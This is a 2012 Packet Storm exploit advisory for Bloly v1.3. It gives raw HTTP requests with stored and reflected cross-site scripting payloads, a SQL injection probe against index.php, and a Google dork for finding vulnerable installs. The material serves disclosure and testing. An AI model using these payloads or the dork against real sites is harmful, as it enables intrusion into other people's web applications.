Bioly 1.3 Cross Site Scripting / SQL Injection

2012-04-13T00:00:00
ID PACKETSTORM:111846
Type packetstorm
Reporter T0xic
Modified 2012-04-13T00:00:00

Description

                                        
                                            `#### # Exploit Title: Bloly v1.3 (/SQL/Xss) Mutiple Vulnerabilities  
# Author: T0x!c  
# Facebook Page: www.facebook.com/DzTem  
# E-mail: Malik_99@hotmail.fr  
# Category:: webapps  
# Google Dork:[intext:"Bloly v1.3 by SoftCab Inc" ]  
# Software : http://www.lbb.org/script/telecharger.php?ID=6859  
# Version: 1.3  
# Tested on: || Windows ||   
####  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |  
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** |  
# | ------------------------------------------------- < |  
##  
  
All vulnerabilities effects /Path/index.php.   
  
####[ p0c 1 | Cross Site Scripting Vulnerabilities : ]===>  
POST /index.php?action=3 HTTP/1.1  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
User-Agent: STORED XSS TEST  
Host: localhost  
Content-Length: 68  
Connection: Close  
Pragma: no-cache  
  
# [Post Data:]==>  
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1  
  
  
####[ Cross Site Scripting in URI : ]===>  
+>Exploit:  
http://localhost/Path/index.php/>"><ScRiPt>alert(490545961838)</ScRiPt>  
  
####[ p0c 2 Sql Injection : ]===>  
POST /index.php?action=11 HTTP/1.1  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Sql Injection  
Host: localhost  
Content-Length: 68  
Connection: Close  
Pragma: no-cache  
  
# [Post Data:]==>  
q=%00'  
  
=================================**AlgeriansHackers**==================================   
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *   
Indoushka * (exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)   
=======================================================================================  
  
  
  
`